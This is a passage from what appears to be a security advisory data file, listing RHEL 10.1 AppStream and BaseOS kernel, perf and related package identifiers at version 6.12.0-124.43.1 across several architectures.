"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
